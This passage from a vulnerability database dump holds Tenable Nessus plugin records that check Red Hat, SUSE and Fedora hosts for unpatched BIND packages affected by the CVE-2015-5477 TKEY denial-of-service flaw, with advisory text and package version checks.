reference:\"bind-9.9.6-10.P1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-01T03:53:03", "bulletinFamily": "scanner", "description": "Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.", "modified": "2020-07-02T00:00:00", "id": "REDHAT-RHSA-2015-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/85068", "published": "2015-07-29T00:00:00", "title": "RHEL 6 / 7 : bind (RHSA-2015:1513)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1513. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85068);\n script_version(\"2.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"RHEL 6 / 7 : bind (RHSA-2015:1513)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1513\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-debuginfo-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-debuginfo-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-01T04:27:13", "bulletinFamily": "scanner", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "SUSE_SU-2015-1304-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85121", "published": "2015-07-30T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : bind (SUSE-SU-2015:1304-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1304-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85121);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/09/11 11:22:12\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : bind (SUSE-SU-2015:1304-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151304-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?52612bed\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-bind-12008=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP3 :\n\nzypper in -t patch sdksp3-bind-12008=1\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-bind-12008=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-bind-12008=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-bind-12008=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-bind-12008=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-bind-12008=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-devel-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-06-05T09:27:41", "bulletinFamily": "scanner", "description": "Update to 9.9.7-P2 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-08-03T00:00:00", "id": "FEDORA_2015-12316.NASL", "href": "https://www.tenable.com/plugins/nessus/85169", "published": "2015-08-03T00:00:00", "title": "Fedora 22 : bind99-9.9.7-6.P2.fc22 (2015-12316)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12316.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85169);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12316\");\n\n script_name(english:\"Fedora 22 : bind99-9.9.7-6.P2.fc22 (2015-12316)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 9.9.7-P2 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45265ef6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind99 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"bind99-9.9.7-6.P2.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind99\");\n}\n", 